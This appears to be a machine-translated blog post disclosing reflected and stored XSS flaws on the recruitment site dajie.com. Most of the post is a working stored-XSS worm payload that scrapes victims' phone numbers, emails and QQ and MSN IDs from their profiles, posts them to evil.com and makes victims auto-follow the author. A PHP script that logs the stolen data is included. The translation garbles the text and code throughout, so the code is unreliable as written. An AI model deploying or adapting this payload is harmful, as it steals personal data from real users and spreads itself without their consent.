Street network rebound and storage XSS vulnerability and test Payload

I went to the street online for an internship in the past few months. Currently, it is the most authoritative website for enterprise school recruitment. After a simple test, I have everything available for storage and rebound XSS. Http://www.dajie.com/http://www.dajie.com/card/exchange/index? KeyWords = 1234 '); alert (document. cookie );//





No filtering. In addition, there are stored XSS in your resume and business cards.

Then visit the personal homepage: through these XSS points, it is easier to collect the Resume Information of some undisclosed users. I wrote a simple XSS Payload, which can collect user contact information and send it to a remote device. The client automatically follows me and uses cookies to avoid secondary pollution. When several functions are in the same domain, the function of automatically Sending Short Messages becomes a simple worm, only sending the Payload part, and using the newer DOM method getElementsByClassName, which is initially related to XSS, hello. XSS Payload: var c_name = "uchome_loginuser" // var c_userid = "" // user IDvar cus_url = "in the cookie Field" http://www.dajie.com/profile/ Mine "// personal information interface var tel =" "// record phone var email =" "// record email var qq =" "// record QQvar msn = ""// record MSN </code> function getCookieValue (c_name) {if (document. cookie. length & gt; 0) // return the Cookie specified field {c_start = document. cookie. indexOf (c_name + "=") if (c_start! =-1) {c_start = c_start + c_name.length + 1; c_end = document. cookie. indexOf (";", c_start) if (c_end =-1) c_end = document. cookie. lengthc_userid = unescape (document. cookie. substring (c_start, c_end) return c_userid} return ""} function setCookieValue (c_name, value) // Add the Cookie value {document. cookie = c_name + "=" + escape (value)} var ajaxGet = nullfunction getUrl (url_addr) {// request GET page content (same domain) through Ajax if (window. XMLHttpRequest) {ajaxGet = new XMLHttpRequest ();} else if (window. activeXObject) {ajaxGet = new ActiveXObject ("Microsoft. XMLHTTP ");} else {return" "} ajaxGet. open ("GET", url_addr, true) ajaxGet. setRequestHeader ("Content-Type", "text/xml") ajaxGet. send (null);} var ajaxPost = nullfunction postUrl (post_url, cusKey, cusValue) // send a POST request to remote {var postStr = cusKey + "=" + cusValueif (window. XMLHttpRequest) {ajaxPost = new XMLHttpRequest ();} else if (window. activeXObject) {ajaxPost = new ActiveXObject ("Microsoft. XMLHTTP ");} else {return" "} ajaxPost. open ("POST", post_url, true) // ajax. setRequestHeader ("Content-Type", "application/x-www-form-urlencoded") ajaxPost. send (postStr)} function getPersonalInfo (responContent) // extract user personal information {var cusNode = document. createElement ("div") cusNode. innerHTML = responContentdocument. body. appendChild (cusNode) var preInfo = document. getElementsByClassName ("tl-contact-item tel") var realInfo = preInfo [0]. getElementsByTagName ("I") tel = realInfo [0]. getAttribute ("title") var preInfo = document. getElementsByClassName ("tl-contact-item qq") var realInfo = preInfo [0]. getElementsByTagName ("I") qq = realInfo [0]. getAttribute ("title") var preInfo = document. getElementsByClassName ("tl-contact-item msn") var realInfo = preInfo [0]. getElementsByTagName ("I") msn = realInfo [0]. getAttribute ("title") var preInfo = document. getElementsByClassName ("tl-contact-item email") var realInfo = preInfo [0]. getElementsByTagName ("I") email = realInfo [0]. getAttribute ("title")} c_userid = getCookieValue (c_name) // obtain the user IDvar icard_url = "from the Cookie" http://www.dajie.com/profile/ "+ C_userid +"/icard "// construct the personal business card Url function FollowMe () // automatically follow the specified user {var img = document. createElement ("img") img. src =" http://www.dajie.com/card/exchange/api/invite?cardUid=xxxxxx&ajax=1 "Document. body. appendChild (img)} if (document. cookie. indexOf ("xssed") =-1) // judge whether the content has been contaminated {var content = "" getUrl (cus_url) // obtain the content of the page ajaxGet. onreadystatechange = function () {if (ajaxGet. readyState = 4 & amp; ajaxGet. status = 200) {content = ajaxGet. responseTextgetPersonalInfo (content) var cusForm = document. createElement ("div"); document. body. appendChild (cusForm) cusForm. innerHTML = '<form id = "xssform" action =" http://www.evil.com/xsstest.php "Method =" post "name =" mbform "> '+' <input type =" text "name =" tel "value =" + escape (tel) + "/> '+' <input type =" text "name =" email "value =" + escape (email) + "/> '+' <input type =" text "name =" qq "value =" + escape (qq) + "/> '+' <input type =" text "name =" msn "value =" + escape (msn) + "/> '+' </form> 'document. getElementById ("xssform "). submit () ;}}followme ()} setCookieValue ("xssed", true) // set the Cookie to avoid multiple cross-site contamination of remote reception information. php <? Php $ ip = $ _ SERVER ['remote _ ADDR ']; $ referer = $ _ SERVER ['HTTP _ referer']; $ agent =$ _ SERVER ['HTTP _ USER_AGENT ']; $ tel =$ _ POST [tel]; $ qq =$ _ POST [qq]; $ msn = $ _ POST [msn]; $ email = $ _ POST [email]; $ time = date ("Y-m-d G: I: s "); $ file = fopen($ip.'.txt ', 'A'); fwrite ($ file, "Tel :". $ tel. "\ nQQ :". $ qq. "\ nMSN :". $ msn. "\ nEmail :". $ email); fclose ($ file); header ("Location :". $ referer); //?>
Solution: Daniel